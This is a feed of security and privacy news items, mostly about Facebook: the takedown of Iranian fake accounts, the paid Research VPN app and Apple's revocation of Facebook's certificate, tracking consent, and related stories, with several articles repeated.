Facebook took down hundreds of fake accounts from Iran that were involved in a vast manipulation campaign active in more than 20 countries.

Facebook took down 783 inauthentic accounts, pages and groups from Iran that were involved in a vast manipulation campaign active in more than 20 countries.

“The world’s biggest social network said it removed 783 pages, groups and accounts “for engaging in coordinated inauthentic behavior tied to Iran.“” reported the AFP Press.

Nathaniel Gleicher, head of cybersecurity policy at Facebook, revealed that the pages were promoting Iranian interest in tens of countries, threat actors used fake identities as residents of those nations,

The pages were part of a campaign to promote Iranian interests in various countries by creating fake identities as residents of those nations, according to a statement by Nathaniel Gleicher, head of cybersecurity policy at Facebook.

Iran manipulation campaign Facebook

Facebook continues its efforts to prevent manipulation of its platform for fraudulent activities.

“We are constantly working to detect and stop this type of activity because we don’t want our services to be used to manipulate people,” Gleicher
declared.

“We’re taking down these pages, groups and accounts based on their behavior, not the content they post. In this case, the people behind this activity coordinated with one another and used fake accounts to misrepresent themselves, and that was the basis for our action.”

Threat actors behind the campaign represented themselves as locals and posted news stories on current events. The accounts were used to discuss about topics of interest for Iranians, such as Israel-Palestine relations and the conflicts in Syria and Yemen.

“This morning we removed 783 Pages, groups and accounts for engaging in coordinated inauthentic behavior tied to Iran. There were multiple sets of activity, each localized for a specific country or region, including Afghanistan, Albania, Algeria, Bahrain, Egypt, France, Germany, India, Indonesia, Iran, Iraq, Israel, Libya, Mexico, Morocco, Pakistan, Qatar, Saudi Arabia, Serbia, South Africa, Spain, Sudan, Syria, Tunisia, US, and Yemen.” wrote Nathaniel Gleicher.

“The Page administrators and account owners typically represented themselves as locals, often using fake accounts, and posted news stories on current events. This included commentary that repurposed Iranian state media’s reporting on topics like Israel-Palestine relations and the conflicts in Syria and Yemen, including the role of the US, Saudi Arabia, and Russia.”

In some cases, the activity carried out by the fake accounts date back to 2010.

Facebook pointed out that although threat actors attempted to hide their identities, the manual review of the activities associated with these accounts allowed them to identify the coordinated inauthentic behavior from Iran.

The campaign operated by threat actors as early as 2010 involved 262 pages, 356 accounts, and three groups on Facebook, as well as 162 accounts on Instagram.

According to Facebook, about 2 million accounts followed at least one of the above pages, about 1,600 accounts joined at least one of the groups, and more than 254,000 accounts followed at least one of these Instagram accounts.

The social network giant reported that operators spent less than $30,000 in ads on Facebook and Instagram, they were paid for primarily in US dollars, UK pounds, Canadian dollars, and euros

“We identified some of these accounts through our continued investigation into Iranian coordinated inauthentic behavior we found and removed last year.” concludes Gleicher.

“Our investigation was aided by open source reporting and information provided to us by our industry peers. We have shared information about our investigation with US law enforcement, the US Congress, and policymakers in impacted countries. “

Pierluigi Paganini

(SecurityAffairs – Facebook, manipulation campaign)

The post Facebook dismantled a vast manipulation campaign tied to Iran appeared first on Security Affairs.

Twitter follow bots cut off from API, as accounts disabled for spreading misinformation from Iran and elsewhere

Angry twitter thumb

ManageFlitter, Statusbrew, and Crowdfire have had their access to the Twitter API revoked for allegedly helping users abuse the service, aggressively and repeatedly following and unfollowing large numbers of other accounts - a tactic frequently employed by Twitter spammers.

Meanwhile, Twitter and Facebook share details of the accounts they have shut down after finding they were spreading misinformation in the run-up to the US midterm elections.

Fake News Sites Are Changing Their Domain Name To Get Around Facebook Fact-Checkers

An anonymous reader quotes a report from Mashable: In order to avoid Facebook's fact checking system, the site formerly known as YourNewsWire, one of the most well-known purveyors of fake news online, has simply rebranded. The site now goes by News Punch and posts fake news content similar to what it published under their former name, according to a report by Poynter. YourNewsWire co-founders Sinclair Treadway and Sean Adl-Tabatabai, who reside in California, founded the site in 2014. The two completely migrated the website from the "yournewswire.com" domain name to "newspunch.com" in November 2018. Treadway told Bloomberg at the time that they move was made due to declining revenue thanks to Facebook's fact-checking system. Under this program, fact-checking outlets like Snopes are able to mark content posted on Facebook as false, which in turn decreases the site's reach on Facebook. According to the investigation, the workaround has been a success. Content that Poynter itself had found to be previously marked false on "yournewswire.com" was ported over to the "newspunch.com" domain. When shared on Facebook, that same fake news content that now lived on "newspunch.com" was not marked as false under the fact-checking program. Facebook is reportedly rolling out features to thwart the site's workaround.

Read more of this story at Slashdot.

Stocks Extend Best Month Since 2015; S&P 500 Clinches Best January Since 1987

U.S. stocks finished higher on Thursday, as the S&P 500 rounded out its best January in 32 years on the back of strong corporate earnings. Cryptocurrencies turned defensive in afternoon trading as XRP failed to sustain a double-digit rally that began midweek. Stocks Close January in Positive Territory The S&P 500 Index rose 0.9% to […]

The post Stocks Extend Best Month Since 2015; S&P 500 Clinches Best January Since 1987 appeared first on Hacked: Hacking Finance.

Apple revokes Facebook’s enterprise certificate due to misuse of customers’ personal data

Reports surfaced revealing Facebook were paying individuals to permit it to watch everything they were doing. This action was allowing

Apple revokes Facebook’s enterprise certificate due to misuse of customers’ personal data on Latest Hacking News.

Apple pulls Facebook enterprise certificate

It’s been an astonishing few days for Facebook. They’ve seen both an app and their enterprise certificate removed and revoked with big consequences.

What happened?

Apple issue enterprise certificates to organizations with which they can create internal apps. Those apps don’t end up released on the Apple store, because the terms of service don’t allow it. Anything storefront-bound must go through the mandatory app checks by Apple before being loaded up for sale.

What went wrong?

Facebook put together a “Facebook research” market research app using the internal process. However, they then went on to distribute it externally to non-Facebook employees. And by “non Facebook employees” we mean “people between the ages of 13 to 35.” In return for access to large swathes of user data, the participants received monthly $20 gift cards.

The program was managed via various Beta testing services, and within hours of news breaking, Facebook stated they’d pulled the app.

Problem solved?

Not exactly. Apple has, in fact, revoked Facebook’s certificate, essentially breaking all of their internal apps and causing major disruptions for their 33,000 or so employees in the process. As per the Apple statement:

We designed our Enterprise Developer Program solely for the internal distribution of apps within an organization. Facebook has been using their membership to distribute a data-collecting app to consumers…a clear breach of their agreement.

Whoops

Yes, whoops. Now the race is on to get things back up and running over at Facebook HQ. Things may be a little tense behind the scenes due to, uh, something similar involving a VPN-themed app collecting data it shouldn’t have been earlier this year. That one didn’t use the developer certificate, but it took some 33 million downloads before Apple noticed and decided to pull the plug.

Could things get any worse for Facebook?

Cue Senator Ed Markey, with a statement on this particular subject:

It is inherently manipulative to offer teens money in exchange for their personal information when younger users don’t have a clear understanding of how much data they’re handing over and how sensitive it is,” said Senator Markey. “I strongly urge Facebook to immediately cease its recruitment of teens for its Research Program and explicitly prohibit minors from participating. Congress also needs to pass legislation that updates children’s online privacy rules for the 21st century. I will be reintroducing my ‘Do Not Track Kids Act’ to update the Children’s Online Privacy Protection Act by instituting key privacy safeguards for teens.

But my concerns also extend to adult users. I am alarmed by reports that Facebook is not providing participants with complete information about the extent of the information that the company can access through this program. Consumers deserve simple and clear explanations of what data is being collected and how it being used.

Well, that definitely sounds like a slide towards “worse” instead of “better.”

A one-two punch?

Facebook is already drawing heavy criticism this past week for the wonderfully-named “friendly fraud” practice of kids making dubious purchases, and chargebacks being made. It happens, sure, but perhaps not quite like this. From the linked Register article:

Facebook, according to the full lawsuit, was encouraging game devs to build Facebook-hosted games that allowed children to input parents’ credit card details, save those details, and then bill over and over without further authorisation.

While large amounts of money were being spent, some refunds proved to be problematic. Employees were querying why most apps with child-related issues are “defaulting to the highest-cost setting in the purchase flows.” You’d better believe there may be further issues worth addressing.

What next?

The Facebook research program app will continue to run on Android, which is unaffected by the certificate antics. There’s also this app from Google in Apple land which has since been pulled due to also operating under Apple’s developer enterprise program. No word yet as to whether or not Apple will revoke Google’s certificate, too. It could be a bumpy few days for some organizations as we wait to see what Apple does next. Facebook, too, could certainly do with a lot less bad publicity as it struggles to regain positive momentum. Whether that happens or not remains to be seen.

The post Apple pulls Facebook enterprise certificate appeared first on Malwarebytes Labs.

Google also abused its Apple developer certificate to collect iOS user data

It turns out that Google, like Facebook, abused its Apple Enterprise Developer Certificate to distribute a data collection app to iOS users, in direct contravention of Apple’s rules for the distribution program. Unlike Facebook, though, the company did not wait for Apple to revoke their certificate. Instead, they quickly to disabled the app on iOS devices, admitted their mistake and extended a public apology to Apple. Google’s app Google’s Screenwise Meter app is very similar … More

The post Google also abused its Apple developer certificate to collect iOS user data appeared first on Help Net Security.

Kaspersky Lab official blog: Transatlantic Cable podcast, episode 76

The 76th edition of the Kaspersky Lab Transatlantic Cable Podcast, David and I cover a number of stories pertaining to privacy and, surprisingly, browsers. To start things off, we look at the issue that Apple faced earlier in the week where a bug in FaceTime that was reported by a kid wound up in the public eye.

Following that tale, we jump into a stranger-than-fiction story about Facebook and their controversial tactic to have users install a VPN to share their data with Facebook. The kicker is that the target audience included kids.

Following Facebook, we stay on the privacy bandwagon and look at the work that Mozilla did to improve the latest version of Firefox. We close out the podcast bidding happy trails to Internet Explorer 10. If you like the podcast, please consider sharing with your friends or subscribing below; if you are interested in the full text of the articles, please click the links below.



Kaspersky Lab official blog

Smashing Security #113: FaceTime, Facebook, faceplant

Smashing Security #113: FaceTime, Facebook, faceplant

FaceTime bug allows callers to see and hear you *before* you answer the phone, Facebook’s Nick Clegg tries to convince us the social network is changing its ways, and IoT hacking is big in Japan.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by John Hawes from AMTSO.

Facebook to become world’s biggest ‘virtual graveyard’ by the end of this century

Have you kept your digital will ready, as about 8,000 Facebook users die daily

Facebook will have more profiles of dead people than those of alive users by the end of this century. The social media giant, which currently has over 2 billion users worldwide, is set to become the world’s ‘biggest virtual graveyard’ by 2098, as nearly 8,000 Facebook users die every day.

Currently, when a user dies on Facebook, it refuses to delete dead users automatically and instead turns the account into a “memorialized” version. The only way that one can delete the account of a dead person is for someone to log in with the password and close it down. However, those accounts that are handled by someone else continues to remain on the site.

In such a scenario, what happens to our digital possessions once we die? Basically, these situations should make digital platforms realize the need to transfer digital assets, such as personal photos, videos and friendly posts to the family once a Facebook user is no more.

“When someone dies leaving behind his email and social media accounts, the same are movable property and that being so, any heirs of the concerned person can seek right to access the same,” says Pavan Duggal, one of the nation’s top cyberlaw experts.

Facebook allows users to appoint a “Legacy Contact” before they die, which can either be a family member or a friend. “Once someone lets us know that a person has passed away, we will memorialize the account,” says Facebook.

Once the user passes away, the legacy contact can manage the page by writing a post to display at the top of the memorialized Timeline. The contact can even approve new friend requests, update cover and profile photo. If one wants, he or she may give legacy contact permission to download an archive of the photos, videos, wall posts, profile and contact info, friends list, and events they shared on Facebook.

However, the legacy contact, will not be able to log in as the deceased user or read that person’s private messages, or remove any of his or her friends or make new friend requests. Alternatively, one can notify Facebook about the member’s death and request for the account to be permanently deleted.

A “digital heir” can keep precious social media moments of the deceased and gift those to future generations via tools such as an external hard disk, Cloud storage, pen drive or DVDs. The said heirs can ask the digital/social media companies to get access after giving the necessary proof.

“Invariably, the service provider may not be inclined to give such access without any requisite order from the court of competent jurisdiction. This could mean getting a succession certificate from a court of competent jurisdiction which could be a time-consuming process,” Duggal told IANS.

Besides Facebook, several social media platforms, such as Twitter, Instagram, WhatsApp, Snapchat, YouTube, Reddit and others too have millions of users.

For instance, Google, owner of Gmail, YouTube and Picasa web albums, has an “Inactive Account Manager” feature that allows you to inform Google what to do with your data after you pass away, whether you want to share it with family and friends or delete it altogether.

It allows a user to propose who has access to his or her information. If a user’s account has been inactive for a while, their accounts can be deleted or shared with a nominated person.

According to Twitter, “In the event of the death of a Twitter user, we can work with a person authorized to act on behalf of the estate or with a verified immediate family member of the deceased to have an account deactivated.”

However, Twitter says that “we are unable to provide account access to anyone regardless of his or her relationship to the deceased”.

Instagram too like Facebook memorializes accounts. However, they cannot be changed and no one can log into the profile. It instead asks the deceased user’s friends and relatives to get in touch with them via email and notify them that the user is no more and submit proof of death. On the other hand, Apple iCloud and iTunes accounts are “non-transferable”, which means that when a user is no more, any rights to information to his or her account cease.

The post Facebook to become world’s biggest ‘virtual graveyard’ by the end of this century appeared first on TechWorm.

Security Affairs: Facebook paid teens $20 to install a Research App that spies on them

Facebook is paying teens $20 a month to use its VPN app, called Facebook Research, that monitors their activity via their mobile devices.Facebook is paying teens $20 a month to use its VPN app, called Facebook Research, that monitors their activity via the mobile devices.

2018 was a terrible year for Facebook that was in the middle of the Cambridge Analytica privacy scandal. The social network giant was involved in other cases, for example, it was forced to remove its Onavo VPN app from Apple’s App Store because it was caught collecting some of data through Onavo Protect, the Virtual Private Network (VPN) service that it acquired in 2013.

According to a report presented by Privacy International in December at 35C3 hacking conference held in Germany, the list of Android apps that send tracking and personal information back to Facebook includes dozens of apps including KayakYelp, and Shazam, Facebook

Now according to a report published by TechCrunch, Facebook is paying teenagers around $20 a month to use its VPN app that monitors their activity on via the mobile devices.

Facebook Research App Icon

Facebook is accused of using the VPN app to track users’ activities across multiple different apps, especially the use of third-party apps.

“Desperate for data on its competitors, Facebook  has been secretly paying people to install a ‘Facebook Research’ VPN that lets the company suck in all of a user’s phone and web activity, similar to Facebook’s Onavo Protect app that Apple banned in June and that was removed in August.” reads the report published by Techcrunch.

“Facebook sidesteps the App Store and rewards teenagers and adults to download the Research app and give it root access to network traffic in what may be a violation of Apple policy so the social network can decrypt and analyze their phone activity, a TechCrunch investigation confirms.”

Techcrunch reported that some documentation refers to the Facebook Research program as “Project Atlas,” it added that Facebook confirmed the existence of the app.

The news is disconcerting, despite the privacy cases in which Facebook was involved, the company has been paying users ages 13 to 35  as much as $20 per month plus referral fees for installing Facebook Research on their iOS or Android devices. The company described the ‘Facebook Research’ app as “paid social media research study.”

Facebook is distributing the app via third-party beta testing services Applause, BetaBound, and uTest that were also running ads on Instagram and Snapchat recruiting participants to install Facebook Research.

Let’s give a close look at the Facebook Research App. The app requires users to install a custom root enterprise certificate to allow the social media giant to collect private messages in social media apps, chats from in instant messaging apps, emails, web searches, web browsing activity, and even ongoing location information by tapping into the feeds of any location tracking apps installed on the users’ devices.

Experts pointed out that in some case, the Facebook Research app also asked users to take screenshots of their Amazon order histories and send it back to Facebook.

Reading the Applause site it is possible to have more info on how the company could use the data:

“By installing the software, you’re giving our client permission to collect data from your phone that will help them understand how you browse the internet, and how you use the features in the apps you’ve installed . . . This means you’re letting our client collect information such as which apps are on your phone, how and when you use them, data about your activities and content within those apps, as well as how other people interact with you or your content within those apps. You are also letting our client collect information about your internet browsing activity (including the websites you visit and data that is exchanged between your device and those websites) and your use of other online services. There are some instances when our client will collect this information even where the app uses encryption, or from within secure browser sessions.” ” the terms read.

Facebook confirmed that the app was developed for research purposes, in particular to study how people use their mobile devices.

“like many companies, we invite people to participate in research that helps us identify things we can be doing better.” explained Facebook.

“helping Facebook understand how people use their mobile devices, we have provided extensive information about the type of data we collect and how they can participate. We do not share this information with others, and people can stop participating at any time.”

Facebook’s spokesperson claimed that the app doesn’t violate the Apple’s Enterprise Certificate program. Techcrunch points out that since Apple requires developers to only use this certificate system for distributing internal corporate apps to their own employees, “recruiting testers and paying them a monthly fee appears to violate the spirit of that rule,”

After the disclosure of the report, Facebook announced that it is planning to shut down the iOS version of the Facebook Research app.

Pierluigi Paganini

(SecurityAffairs – Facebook Research app, Privacy)

The post Facebook paid teens $20 to install a Research App that spies on them appeared first on Security Affairs.



Security Affairs

Facebook paid teens $20 to install a Research App that spies on them

Facebook is paying teens $20 a month to use its VPN app, called Facebook Research, that monitors their activity via their mobile devices.Facebook is paying teens $20 a month to use its VPN app, called Facebook Research, that monitors their activity via the mobile devices.

2018 was a terrible year for Facebook that was in the middle of the Cambridge Analytica privacy scandal. The social network giant was involved in other cases, for example, it was forced to remove its Onavo VPN app from Apple’s App Store because it was caught collecting some of data through Onavo Protect, the Virtual Private Network (VPN) service that it acquired in 2013.

According to a report presented by Privacy International in December at 35C3 hacking conference held in Germany, the list of Android apps that send tracking and personal information back to Facebook includes dozens of apps including KayakYelp, and Shazam, Facebook

Now according to a report published by TechCrunch, Facebook is paying teenagers around $20 a month to use its VPN app that monitors their activity on via the mobile devices.

Facebook Research App Icon

Facebook is accused of using the VPN app to track users’ activities across multiple different apps, especially the use of third-party apps.

“Desperate for data on its competitors, Facebook  has been secretly paying people to install a ‘Facebook Research’ VPN that lets the company suck in all of a user’s phone and web activity, similar to Facebook’s Onavo Protect app that Apple banned in June and that was removed in August.” reads the report published by Techcrunch.

“Facebook sidesteps the App Store and rewards teenagers and adults to download the Research app and give it root access to network traffic in what may be a violation of Apple policy so the social network can decrypt and analyze their phone activity, a TechCrunch investigation confirms.”

Techcrunch reported that some documentation refers to the Facebook Research program as “Project Atlas,” it added that Facebook confirmed the existence of the app.

The news is disconcerting, despite the privacy cases in which Facebook was involved, the company has been paying users ages 13 to 35  as much as $20 per month plus referral fees for installing Facebook Research on their iOS or Android devices. The company described the ‘Facebook Research’ app as “paid social media research study.”

Facebook is distributing the app via third-party beta testing services Applause, BetaBound, and uTest that were also running ads on Instagram and Snapchat recruiting participants to install Facebook Research.

Let’s give a close look at the Facebook Research App. The app requires users to install a custom root enterprise certificate to allow the social media giant to collect private messages in social media apps, chats from in instant messaging apps, emails, web searches, web browsing activity, and even ongoing location information by tapping into the feeds of any location tracking apps installed on the users’ devices.

Experts pointed out that in some case, the Facebook Research app also asked users to take screenshots of their Amazon order histories and send it back to Facebook.

Reading the Applause site it is possible to have more info on how the company could use the data:

“By installing the software, you’re giving our client permission to collect data from your phone that will help them understand how you browse the internet, and how you use the features in the apps you’ve installed . . . This means you’re letting our client collect information such as which apps are on your phone, how and when you use them, data about your activities and content within those apps, as well as how other people interact with you or your content within those apps. You are also letting our client collect information about your internet browsing activity (including the websites you visit and data that is exchanged between your device and those websites) and your use of other online services. There are some instances when our client will collect this information even where the app uses encryption, or from within secure browser sessions.” ” the terms read.

Facebook confirmed that the app was developed for research purposes, in particular to study how people use their mobile devices.

“like many companies, we invite people to participate in research that helps us identify things we can be doing better.” explained Facebook.

“helping Facebook understand how people use their mobile devices, we have provided extensive information about the type of data we collect and how they can participate. We do not share this information with others, and people can stop participating at any time.”

Facebook’s spokesperson claimed that the app doesn’t violate the Apple’s Enterprise Certificate program. Techcrunch points out that since Apple requires developers to only use this certificate system for distributing internal corporate apps to their own employees, “recruiting testers and paying them a monthly fee appears to violate the spirit of that rule,”

After the disclosure of the report, Facebook announced that it is planning to shut down the iOS version of the Facebook Research app.

Pierluigi Paganini

(SecurityAffairs – Facebook Research app, Privacy)

The post Facebook paid teens $20 to install a Research App that spies on them appeared first on Security Affairs.

Apple Says It’s Banning Facebook’s Research App That Collects Users’ Personal Information

Facebook is at the center of another privacy scandal -- and this time it hasn't just angered users. It has also angered Apple. From a report: The short version: Apple says Facebook broke an agreement it made with Apple by publishing a "research" app for iPhone users that allowed the social giant to collect all kinds of personal data about those users, TechCrunch reported Tuesday. The app allowed Facebook to track users' app history, their private messages and their location data. Facebook's research effort reportedly targeted users as young as 13 years old. As of last summer, apps that collect that kind of data are against Apple's privacy guidelines. That means Facebook couldn't make this research app available through the App Store, which would have required Apple approval. Instead, Facebook apparently took advantage of Apple's "Developer Enterprise Program," which lets approved Apple partners, like Facebook, test and distribute apps specifically for their own employees. In those cases, the employees can use third-party services to download beta versions of apps that aren't available to the general public. Update: The Verge reports: Apple has shut down Facebook's ability to distribute internal iOS apps, from early releases of the Facebook app to basic tools like a lunch menu. A person familiar with the situation tells The Verge that early versions of Facebook, Instagram, Messenger, and other pre-release "dogfood" (beta) apps have stopped working, as have other employee apps, like one for transportation. Facebook is treating this as a critical problem internally, we're told, as the affected apps simply don't launch on employees' phones anymore. Update 2: Apple says it shut down Facebook's app before the social company could voluntarily shut it down -- contrary to an earlier statement by Facebook, in which it said it was shutting down the app.

Read more of this story at Slashdot.

Facebook to shut down iOS app that allowed for near total data access

When Apple banned its Onavo VPN app from its App Store last summer, Facebook took repackaged the app, named it “Facebook Research” and offered it for download through three app beta testing services, TechCrunch has discovered. About the Facebook Research app Facebook used the Onavo app to collect the aforementioned data of both Android and iOS users and, based on the information gleaned from it, made decisions to acquire competing apps and add popular features … More

The post Facebook to shut down iOS app that allowed for near total data access appeared first on Help Net Security.

Facebook Pays Teens to Download a VPN App That Spies on Them

In an attempt to gather data on its competitors, Facebook has been secretly paying people to install a VPN to

Facebook Pays Teens to Download a VPN App That Spies on Them on Latest Hacking News.

Facebook Pays Teens To Install VPN That Spies On Them

A new report from TechCrunch details how "desperate" Facebook is for data on its competitors. The social media company "has been secretly paying people to install a 'Facebook Research' VPN that lets the company suck in all of a user's phone and web activity," a TechCrunch investigation confirms. "Facebook sidesteps the App Store and rewards teenagers and adults to download the Research app and give it root access in what may be a violation of Apple policy so the social network can decrypt and analyze their phone activity." From the report: Since 2016, Facebook has been paying users ages 13 to 35 up to $20 per month plus referral fees to sell their privacy by installing the iOS or Android "Facebook Research" app. Facebook even asked users to screenshot their Amazon order history page. The program is administered through beta testing services Applause, BetaBound and uTest to cloak Facebook's involvement, and is referred to in some documentation as "Project Atlas" a fitting name for Facebook's effort to map new trends and rivals around the globe. We asked Guardian Mobile Firewall's security expert Will Strafach to dig into the Facebook Research app, and he told us that "If Facebook makes full use of the level of access they are given by asking users to install the Certificate, they will have the ability to continuously collect the following types of data: private messages in social media apps, chats from in instant messaging apps -- including photos/videos sent to others, emails, web searches, web browsing activity, and even ongoing location information by tapping into the feeds of any location tracking apps you may have installed." It's unclear exactly what data Facebook is concerned with, but it gets nearly limitless access to a user's device once they install the app.

Read more of this story at Slashdot.

IT Security Expert Blog: 43% of Cybercrimes Target Small Businesses – Are You Next?

Cybercrimes cost UK small companies an average of £894 in the year ending February of 2018. Small businesses are an easy target for cybercrooks, so it little surprise that around about 43% of cybercrime is committed against small businesses. According to research conducted by EveryCloud, there is much more at stake than a £900 annual loss, with six out of ten small businesses closing within six months of a data breach.

Damage to a small company’s reputation can be difficult to repair and recover from following a data breach. Since the GDPR data privacy law came in force in May 2018, companies face significant financial sanctions from regulators if found negligent in safeguarding personal information. Add in the potential for civil suits the potential costs start mounting up fast, which could even turn into a business killer.  Case in point is political consulting and data mining firm Cambridge Analytica, which went under in May 2018 after being implicated with data privacy issues related to its use of personal data held on Facebook. However, most small businesses taken out by cyber attacks don't have the public profile to make the deadly headlines.

Most big companies have contingency plans and resources to take the hit from a major cyber attack, although major cyber attacks prove highly costly to big business, the vast majority are able to recover and continue trading. Working on a tight budget, small businesses just doesn't the deep pockets of big business. Cyber resilience is not a high priority within most small businesses strategies, as you might image business plans are typically very business growth focused.

Cyber resilience within small business need not be difficult, but it does involve going beyond installing antivirus. A great starting point is UK National Cyber Security Centre's Cyber Essentials Scheme, a simple but effective approach to help businesses protect themselves from the most common cyber attacks. You’ll also need to pay attention to staff security awareness training in the workplace.

Every employee must ensure that the company is protected from attacks as much as possible. It’s your responsibility to make sure that everyone understands this and knows what preventative measures to put in place.

It may cost a few bob, but getting an expert in to check for holes in your cybersecurity is a good place to start. They can check for potential risk areas and also educate you and your staff about security awareness.

We all know the basics, but how many times do we let convenience trump good common sense? For example, how many times have you used the same password when registering for different sites?

How strong is the password that you chose? If it’s easy for you to remember, then there’s a good chance that it’s not as secure as you’d like. If you’d like more tips on keeping your information secure, then check out the infographic below.




IT Security Expert Blog

43% of Cybercrimes Target Small Businesses – Are You Next?

Cybercrimes cost UK small companies an average of £894 in the year ending February of 2018. Small businesses are an easy target for cybercrooks, so it little surprise that around about 43% of cybercrime is committed against small businesses. According to research conducted by EveryCloud, there is much more at stake than a £900 annual loss, with six out of ten small businesses closing within six months of a data breach.

Damage to a small company’s reputation can be difficult to repair and recover from following a data breach. Since the GDPR data privacy law came in force in May 2018, companies face significant financial sanctions from regulators if found negligent in safeguarding personal information. Add in the potential for civil suits the potential costs start mounting up fast, which could even turn into a business killer.  Case in point is political consulting and data mining firm Cambridge Analytica, which went under in May 2018 after being implicated with data privacy issues related to its use of personal data held on Facebook. However, most small businesses taken out by cyber attacks don't have the public profile to make the deadly headlines.

Most big companies have contingency plans and resources to take the hit from a major cyber attack, although major cyber attacks prove highly costly to big business, the vast majority are able to recover and continue trading. Working on a tight budget, small businesses just doesn't the deep pockets of big business. Cyber resilience is not a high priority within most small businesses strategies, as you might image business plans are typically very business growth focused.

Cyber resilience within small business need not be difficult, but it does involve going beyond installing antivirus. A great starting point is UK National Cyber Security Centre's Cyber Essentials Scheme, a simple but effective approach to help businesses protect themselves from the most common cyber attacks. You’ll also need to pay attention to staff security awareness training in the workplace.

Every employee must ensure that the company is protected from attacks as much as possible. It’s your responsibility to make sure that everyone understands this and knows what preventative measures to put in place.

It may cost a few bob, but getting an expert in to check for holes in your cybersecurity is a good place to start. They can check for potential risk areas and also educate you and your staff about security awareness.

We all know the basics, but how many times do we let convenience trump good common sense? For example, how many times have you used the same password when registering for different sites?

How strong is the password that you chose? If it’s easy for you to remember, then there’s a good chance that it’s not as secure as you’d like. If you’d like more tips on keeping your information secure, then check out the infographic below.


What does ‘consent to tracking’ really mean?

Thanks to Jerome Boursier for contributions.

Post GDPR, many social media platforms will ask end users to consent to some form of tracking as a condition of using the service. It’s easy to make assumptions as to what that means, especially when the actual terms of service or data policy for the service in question is tough to find, full of legal jargon, or just long and boring. Part of the shock of Facebook stories was in discovering just how expansive their consent to tracking really was. Let’s take a look at what can happen after you hit OK on a new site’s Terms of Service.

What we think they’re doing

Most commonly, users think that social media sites limit their tracking to actual interactions with the site while logged in. This includes likes, follows, favorites, and general use of the site as intended. Those interactions are then analyzed to determine a user’s rough interests, and serve them corresponding ads.

We asked some non-technical Malwarebytes staffers what they thought popular companies collected on them and got the following responses:

“Hmm I would assume just my name, birthday, trends in the hashtags I use, and locations I’m at. Nothing else.”

“As far as IG goes, I’m guessing they collect data on the hashtags I follow and what I look at because all the ads are home improvement ads.”

While these are common use cases for tracking, innovations in user surveillance have allowed companies to take much more invasive actions.

What they’re actually doing

The Cambridge Analytica reports were quite shocking, but in theory their data practices were actually a violation of the agreement they had with Facebook. Somewhat more concerning are actions that Facebook and other social media companies take overtly with third parties, or as part of their explicit terms of service.

In June 2018, a New York Times report revealed partnerships between Facebook and mobile device manufacturers allowed data collection on your Facebook friends, irrespective of whether those friends had allowed data sharing with third parties. This data collection varied by device manufacturer, and most were relatively benign. Blackberry, however, seemed to go beyond what most of us expect to be collected when we log in:

Facebook has been known for years to have somewhat creepy partnerships like this. But what about other platforms? Instagram has an interesting paragraph in its terms and conditions:

Does communications include direct messages? How long is this information stored, where, and under what conditions? It could be perfectly secure and anonymized, but it’s difficult to tell because Instagram is a little vague on these points. Companies tell us what they collect consistently but they don’t always tell us why or disclose retention conditions, which makes it difficult for a user to make a proper risk assessment for allowing tracking.

Outside of the Facebook family of products, Pinterest does some data sharing that you might not expect:

Kudos to Pinterest for providing clear opt-out instructions.

A reasonable user might not expect that when consent to tracking connected with a Pinterest account, they would also agree to offsite tracking. Pinterest does stand out, however, by presenting well organized and clear information followed by simple opt-out instructions after each section.

What they might be doing

Most platforms that engage in user tracking do so in ways that raise concern, but are not overtly alarming. Abuses we’ve heard about tend to center on the tracking company sharing information with third parties. So what might happen if the wrong third party gains access to this data?

In 2016, a Pro Publica investigation was able to use Facebook ad targeting to create a housing ad that excluded minorities from seeing it. (This probably violates the US Fair Housing Act.) Using user data to discriminate in plausibly deniable ways predates the Internet, but the unprecedented volume of data collected makes schemes by bad actors much more efficient and easy to launch.

A more speculative harm is the use of tracking tags on sensitive websites. In France, a government website providing accurate information on reproductive health services was using a Facebook tracker. A “trusted partner” receiving user metadata, as well as which sections of the site that user clicks on, has the potential to be profoundly invasive. From a risk mitigation perspective, a user with a Facebook account might not have anticipated this sort of tracking when they initially consented to Facebook’s terms of service.

A common counter to complaints regarding user tracking is, “Well, you agreed to their terms, so you should have expected this.” This is arguably applicable to basic metadata collection and targeted ads, but is it reasonable to expect a Facebook user to understand that their off-platform browsing is subject to surveillance as well? User tracking has progressed so far in sophistication that an average user most likely does not have the background necessary to imagine every possible use case for data collection prior to accepting a user agreement.

What you can do about it

If any of the above examples make you uncomfortable, check out how to secure some common social media platforms using internal settings. If you want to implement additional technical solutions, browser extensions like Ghostery and the EFF’s Privacy Badger can prevent trackers from sucking up data you would prefer not to hand over.

Messenger services are a bit harder to transition away from, but not impossible. Signal is a well-regarded messenger app with end-to-end encryption, and a history of respecting user privacy. Alternatively, Wire can provide a more business-oriented alternative, with screen sharing, file sharing, and access role management.

Most important is to stay suspicious when accessing a new platform. No one can mishandle data that you never agree to hand over to begin with. Stay vigilant, stay safe, and enjoy your social media platforms knowing exactly how your data is being used.

The post What does ‘consent to tracking’ really mean? appeared first on Malwarebytes Labs.

HOTforSecurity: Facebook to Merge WhatsApp, Instagram, Facebook Messenger by 2020

Looking to gain more control over the company’s communication platforms and prevent users from switching to competitors, Facebook CEO Mark Zuckerberg will merge WhatsApp, Instagram and Facebook Messenger, writes The New York Times. The integration is expected to be complete by 2020 and will serve over 2.6 billion users.

“The services will continue to operate as stand-alone apps, but their underlying technical infrastructure will be unified,” the newspaper reported, citing four people involved in the effort, whom it didn’t name.

The merger, part of the tech company’s larger plan to increase revenue and advertising opportunities, raises security and privacy concerns regarding user data and how the cross-platform communication will further handle data sharing.

“This is why there should have been far more scrutiny during Facebook’s acquisitions of Instagram and WhatsApp, which now clearly seem like horizontal mergers that should have triggered antitrust scrutiny,” Representative Ro Khanna, Democrat of California, said on Twitter. “Imagine how different the world would be if Facebook had to compete with Instagram and WhatsApp.”

According to Facebook, the apps will benefit from end-to-end encryption because they want to “build the best messaging experiences we can; and people want messaging to be fast, simple, reliable and private. We’re working on making more of our messaging products end-to-end encrypted and considering ways to make it easier to reach friends and family across networks.”

However, the merger and possible lack of autonomy raise trust issues and internal conflicts, following the departure of WhatsApp and Instagram founders. Inside sources who spoke with The New York Times say the reconfiguration of all three services will be the work of thousands but the company is still figuring out all the details.  



HOTforSecurity

Facebook to Merge WhatsApp, Instagram, Facebook Messenger by 2020

